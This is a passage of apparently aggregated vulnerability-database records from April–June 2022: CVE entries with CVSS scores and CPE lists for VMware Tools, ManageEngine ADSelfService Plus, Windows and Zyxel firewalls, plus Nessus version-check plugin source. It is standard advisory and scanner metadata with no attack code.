File Enumeration Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-26809](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26809>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-24528](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24528>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-24492](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24492>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-24533](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24533>) | Remote Desktop Protocol Remote Code Execution Vulnerability | No | No | 8 | Yes \n[CVE-2022-24493](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24493>) | Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability | No | No | 5.5 | Yes \n \n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:48:11", "type": "rapid7blog", "title": "Patch Tuesday - April 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1125", "CVE-2022-1127", "CVE-2022-1128", "CVE-2022-1129", "CVE-2022-1130", "CVE-2022-1131", "CVE-2022-1133", "CVE-2022-1134", "CVE-2022-1135", "CVE-2022-1136", "CVE-2022-1137", "CVE-2022-1138", "CVE-2022-1139", "CVE-2022-1143", "CVE-2022-1145", "CVE-2022-1146", "CVE-2022-1232", "CVE-2022-21983", "CVE-2022-22008", "CVE-2022-22009", "CVE-2022-23257", "CVE-2022-23259", "CVE-2022-23268", "CVE-2022-23292", "CVE-2022-24472", "CVE-2022-24473", "CVE-2022-24474", "CVE-2022-24475", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24484", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24488", "CVE-2022-24489", "CVE-2022-24490", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24513", "CVE-2022-24521", "CVE-2022-24523", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24532", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24537", "CVE-2022-24538", "CVE-2022-24539", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24543", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24548", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-24765", "CVE-2022-24767", "CVE-2022-26783", "CVE-2022-26784", "CVE-2022-26785", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26791", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26811", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26814", "CVE-2022-26815", "CVE-2022-26816", "CVE-2022-26817", "CVE-2022-26818", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26823", "CVE-2022-26824", "CVE-2022-26825", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26829", "CVE-2022-26830", "CVE-2022-26831", "CVE-2022-26832", "CVE-2022-26891", "CVE-2022-26894", "CVE-2022-26895", "CVE-2022-26896", "CVE-2022-26897", "CVE-2022-26898", "CVE-2022-26900", "CVE-2022-26901", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26907", "CVE-2022-26908", "CVE-2022-26909", "CVE-2022-26910", "CVE-2022-26911", "CVE-2022-26912", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920", "CVE-2022-26921", "CVE-2022-26924"], "modified": "2022-04-12T18:48:11", "id": "RAPID7BLOG:266ADCD22F7AAC05069D569EBF2FEBB9", "href": "https://blog.rapid7.com/2022/04/12/patch-tuesday-april-2022/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-06-09T17:35:11", "description": "VMware Tools for Windows(12.0.0, 11.x.y and 10.x.y) contains an XML External Entity (XXE) vulnerability. A malicious actor with non-administrative local user privileges in the Windows guest OS, where VMware Tools is installed, may exploit this issue leading to a denial-of-service condition or unintended information disclosure.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-24T19:15:00", "type": "cve", "title": "CVE-2022-22977", "cwe": ["CWE-611"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22977"], "modified": "2022-06-09T15:52:00", "cpe": ["cpe:/a:vmware:tools:10.3.24", "cpe:/a:vmware:tools:11.3.5"], "id": "CVE-2022-22977", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22977", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:vmware:tools:11.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:tools:10.3.24:*:*:*:*:*:*:*"]}, {"lastseen": "2022-04-26T20:50:40", "description": "Zoho ManageEngine ADSelfService Plus before build 6122 allows a remote authenticated administrator to execute arbitrary operating OS commands as SYSTEM via the policy custom script feature. Due to the use of a default administrator password, attackers may be able to abuse this functionality with minimal effort. Additionally, a remote and partially authenticated attacker may be able to inject arbitrary commands into the custom script due to an unsanitized password field.", "cvss3": {"exploitabilityScore": 0.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-18T13:15:00", "type": "cve", "title": "CVE-2022-28810", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-28810"], "modified": "2022-04-26T18:07:00", "cpe": ["cpe:/a:zohocorp:manageengine_adselfservice_plus:6.1"], "id": "CVE-2022-28810", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-28810", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6119:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6105:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6103:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6106:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_adselfservice_plus:6.1:6111:*:*:*:*:*:*"]}, {"lastseen": "2022-04-21T22:44:00", "description": "Windows Endpoint Configuration Manager Elevation of Privilege Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-15T19:15:00", "type": "cve", "title": "CVE-2022-24527", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-24527"], "modified": "2022-04-21T20:49:00", "cpe": ["cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-"], "id": "CVE-2022-24527", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-24527", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-03T20:33:39", "description": "A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T14:15:00", "type": "cve", "title": "CVE-2022-30525", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-03T18:15:00", "cpe": ["cpe:/o:zyxel:usg_flex_500_firmware:5.30"], "id": "CVE-2022-30525", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-30525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:zyxel:usg_flex_500_firmware:5.30:*:*:*:*:*:*:*"]}], "vmware": [{"lastseen": "2022-06-09T18:06:39", "description": "3\\. XML External Entity (XXE) vulnerability (CVE-2022-22977) \n\nVMware Tools for Windows contains an XML External Entity (XXE) vulnerability. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.8.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-05-24T00:00:00", "type": "vmware", "title": "VMware Tools for Windows update addresses an XML External Entity (XXE) vulnerability (CVE-2022-22977)", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22977"], "modified": "2022-05-24T00:00:00", "id": "VMSA-2022-0015", "href": "https://www.vmware.com/security/advisories/VMSA-2022-0015.html", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}], "nessus": [{"lastseen": "2022-06-15T17:02:26", "description": "The version of VMware Tools installed on the remote Windows host is affected by an XML External Entity (XXE) vulnerability. A malicious actor with non-administrative local user privileges in the Windows guest OS, where VMware Tools is installed, may exploit this issue leading to a denial-of-service condition or unintended information disclosure.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 7.1, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H"}, "published": "2022-05-27T00:00:00", "type": "nessus", "title": "VMware Tools 10.x / 11.x / 12.x < 12.0.5 XXE (VMSA-2022-0015)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22977"], "modified": "2022-06-10T00:00:00", "cpe": ["cpe:/a:vmware:tools"], "id": "VMWARE_TOOLS_WIN_VMSA-2022-0015.NASL", "href": "https://www.tenable.com/plugins/nessus/161605", "sourceData": "##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(161605);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/10\");\n\n script_cve_id(\"CVE-2022-22977\");\n script_xref(name:\"VMSA\", value:\"VMSA-2022-0015\");\n script_xref(name:\"IAVB\", value:\"2022-B-0014\");\n\n script_name(english:\"VMware Tools 10.x / 11.x / 12.x < 12.0.5 XXE (VMSA-2022-0015)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A virtualization tool suite is installed on the remote Windows host is affected by an XML External Entity\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Tools installed on the remote Windows host is affected by an XML External Entity (XXE)\nvulnerability. A malicious actor with non-administrative local user privileges in the Windows guest OS, where VMware\nTools is installed, may exploit this issue leading to a denial-of-service condition or unintended information\ndisclosure.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2022-0015.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Tools version 12.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22977\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:tools\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_tools_installed.nbin\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"installed_sw/VMware Tools\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nvar app_info = vcf::get_app_info(app:'VMware Tools', win_local:TRUE);\nvar constraints = [{ 'min_version' : '10.0', 'fixed_version' : '12.0.5' }];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_NOTE);\n", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2022-06-19T17:40:03", "description": "The remote Windows host is missing security update 5012632 or cumulative update 5012658. It is, therefore, affected by multiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813, CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917, CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819, CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534, CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983, \tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges. (CVE-2022-26797, CVE-2022-26796,CVE-2022-26904,CVE-2022-26798,CVE-2022-26801, CVE-2022-26802,CVE-2022-26810,CVE-2022-26792,CVE-2022-26794, CVE-2022-26790,CVE-2022-24544,CVE-2022-24540,CVE-2022-24481, CVE-2022-24527,CVE-2022-24474,CVE-2022-24521,CVE-2022-24499, CVE-2022-24494,CVE-2022-24542,CVE-2022-24530)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26915, CVE-2022-26831)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24498)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012632: Windows Server 2008 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-24474", "CVE-2022-24481", "CVE-2022-24485", "CVE-2022-24492", "CVE-2022-24494", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24534", "CVE-2022-24536", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26794", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26812", "CVE-2022-26813", "CVE-2022-26815", "CVE-2022-26819", "CVE-2022-26820", "CVE-2022-26821", "CVE-2022-26822", "CVE-2022-26829", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012632.NASL", "href": "https://www.tenable.com/plugins/nessus/159684", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159684);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/01\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-24474\",\n \"CVE-2022-24481\",\n \"CVE-2022-24485\",\n \"CVE-2022-24492\",\n \"CVE-2022-24494\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24534\",\n \"CVE-2022-24536\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26794\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26812\",\n \"CVE-2022-26813\",\n \"CVE-2022-26815\",\n \"CVE-2022-26819\",\n \"CVE-2022-26820\",\n \"CVE-2022-26821\",\n \"CVE-2022-26822\",\n \"CVE-2022-26829\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\"\n );\n script_xref(name:\"MSKB\", value:\"5012632\");\n script_xref(name:\"MSKB\", value:\"5012658\");\n script_xref(name:\"MSFT\", value:\"MS22-5012632\");\n script_xref(name:\"MSFT\", value:\"MS22-5012658\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012632: Windows Server 2008 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012632\nor cumulative update 5012658. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-26916,\n CVE-2022-26812,CVE-2022-26919,CVE-2022-26918,CVE-2022-26813,\n CVE-2022-26821,CVE-2022-26815,CVE-2022-26822,CVE-2022-26917,\n CVE-2022-26829,CVE-2022-26820,CVE-2022-26809,CVE-2022-26819,\n CVE-2022-24541,CVE-2022-24492,CVE-2022-24536,CVE-2022-24534,\n CVE-2022-24485,CVE-2022-26903,CVE-2022-24528,CVE-2022-21983,\n\tCVE-2022-24500)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges. (CVE-2022-26797,\n 